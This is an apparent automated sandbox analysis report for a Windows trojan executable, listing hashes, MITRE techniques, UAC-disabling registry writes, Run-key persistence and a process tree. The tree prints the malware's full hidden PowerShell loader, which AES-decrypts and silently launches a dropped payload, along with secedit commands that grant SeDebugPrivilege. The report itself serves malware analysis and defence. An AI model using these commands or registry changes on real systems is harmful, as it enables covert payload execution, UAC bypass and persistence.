8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 03:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
Size

20.9MB
MD5

fde030055d5150a1641b35806d981818
SHA1

df0663eb909df92f62dc1cee17b50dbbfba158c5
SHA256

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94
SHA512

55448fbd62c1fcee1930b3e3b22e6cfdc212ccae192d474de9280fd5a1dc8a8213c91489f9d32095719d30163ba8b70aaf052048da37799dc323fc2403bbe0e9
SSDEEP

393216:aechJVBlobQzoAb0m/oeLRIOoWdwUcdsKgbyyBkCfDrnyh:mRzoAb0NeNIl/kz/o

Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe
2876	powershell.exe
2712	powershell.exe
2852	powershell.exe
2772	powershell.exe
444	powershell.exe
1972	powershell.exe
1952	powershell.exe
872	powershell.exe
2708	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1076	irsetup.exe
1176	Process not Found
2904	iusb3mon.exe

Loads dropped DLL 3 IoCs

pid	Process
328	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
1076	irsetup.exe
1076	irsetup.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b000000015d2e-77.dat	upx
behavioral1/memory/2904-78-0x0000000000400000-0x000000000053F000-memory.dmp	upx
behavioral1/memory/2904-231-0x0000000000400000-0x000000000053F000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\product1\letsvpn-latest.exe	irsetup.exe
File opened for modification	C:\Program Files\product1\letsvpn-latest.exe	irsetup.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 5 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2852	powershell.exe
2772	powershell.exe
2712	powershell.exe
2708	powershell.exe
2876	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iusb3mon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
1076	irsetup.exe
2712	powershell.exe
2820	powershell.exe
2708	powershell.exe
2876	powershell.exe
2852	powershell.exe
2772	powershell.exe
2820	powershell.exe
2820	powershell.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
872	powershell.exe
1952	powershell.exe
444	powershell.exe
1972	powershell.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe
2904	iusb3mon.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1076	irsetup.exe
1076	irsetup.exe
2904	iusb3mon.exe
2904	iusb3mon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 328 wrote to memory of 1076	328	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 328 wrote to memory of 1076	328	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 328 wrote to memory of 1076	328	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 1076 wrote to memory of 2820	1076	irsetup.exe	31
PID 1076 wrote to memory of 2820	1076	irsetup.exe	31
PID 1076 wrote to memory of 2820	1076	irsetup.exe	31
PID 1076 wrote to memory of 2708	1076	irsetup.exe	33
PID 1076 wrote to memory of 2708	1076	irsetup.exe	33
PID 1076 wrote to memory of 2708	1076	irsetup.exe	33
PID 1076 wrote to memory of 2712	1076	irsetup.exe	35
PID 1076 wrote to memory of 2712	1076	irsetup.exe	35
PID 1076 wrote to memory of 2712	1076	irsetup.exe	35
PID 1076 wrote to memory of 2876	1076	irsetup.exe	37
PID 1076 wrote to memory of 2876	1076	irsetup.exe	37
PID 1076 wrote to memory of 2876	1076	irsetup.exe	37
PID 1076 wrote to memory of 2852	1076	irsetup.exe	39
PID 1076 wrote to memory of 2852	1076	irsetup.exe	39
PID 1076 wrote to memory of 2852	1076	irsetup.exe	39
PID 1076 wrote to memory of 2772	1076	irsetup.exe	41
PID 1076 wrote to memory of 2772	1076	irsetup.exe	41
PID 1076 wrote to memory of 2772	1076	irsetup.exe	41
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2820 wrote to memory of 2904	2820	powershell.exe	43
PID 2904 wrote to memory of 444	2904	iusb3mon.exe	44
PID 2904 wrote to memory of 444	2904	iusb3mon.exe	44
PID 2904 wrote to memory of 444	2904	iusb3mon.exe	44
PID 2904 wrote to memory of 444	2904	iusb3mon.exe	44
PID 2904 wrote to memory of 1972	2904	iusb3mon.exe	45
PID 2904 wrote to memory of 1972	2904	iusb3mon.exe	45
PID 2904 wrote to memory of 1972	2904	iusb3mon.exe	45
PID 2904 wrote to memory of 1972	2904	iusb3mon.exe	45
PID 2904 wrote to memory of 1952	2904	iusb3mon.exe	46
PID 2904 wrote to memory of 1952	2904	iusb3mon.exe	46
PID 2904 wrote to memory of 1952	2904	iusb3mon.exe	46
PID 2904 wrote to memory of 1952	2904	iusb3mon.exe	46
PID 2904 wrote to memory of 872	2904	iusb3mon.exe	47
PID 2904 wrote to memory of 872	2904	iusb3mon.exe	47
PID 2904 wrote to memory of 872	2904	iusb3mon.exe	47
PID 2904 wrote to memory of 872	2904	iusb3mon.exe	47
PID 2904 wrote to memory of 2908	2904	iusb3mon.exe	51
PID 2904 wrote to memory of 2908	2904	iusb3mon.exe	51
PID 2904 wrote to memory of 2908	2904	iusb3mon.exe	51
PID 2904 wrote to memory of 2908	2904	iusb3mon.exe	51
PID 1972 wrote to memory of 1944	1972	powershell.exe	54
PID 1972 wrote to memory of 1944	1972	powershell.exe	54
PID 1972 wrote to memory of 1944	1972	powershell.exe	54
PID 1972 wrote to memory of 1944	1972	powershell.exe	54
PID 872 wrote to memory of 2028	872	powershell.exe	56
PID 872 wrote to memory of 2028	872	powershell.exe	56
PID 872 wrote to memory of 2028	872	powershell.exe	56
PID 872 wrote to memory of 2028	872	powershell.exe	56
PID 444 wrote to memory of 2928	444	powershell.exe	55
PID 444 wrote to memory of 2928	444	powershell.exe	55
PID 444 wrote to memory of 2928	444	powershell.exe	55
PID 444 wrote to memory of 2928	444	powershell.exe	55
PID 1952 wrote to memory of 2216	1952	powershell.exe	57
PID 1952 wrote to memory of 2216	1952	powershell.exe	57
PID 1952 wrote to memory of 2216	1952	powershell.exe	57
PID 1952 wrote to memory of 2216	1952	powershell.exe	57

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe

C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
"C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:328
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5657458 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3533259084-2542256011-65585152-1000"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\ProgramData\Program\iusb3mon.exe
      "C:\ProgramData\Program\iusb3mon.exe" $false
      4⤵
      UAC bypass
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2904
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:444
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2928
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1972
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1952
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2216
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:872
      - C:\Windows\SysWOW64\SecEdit.exe
        
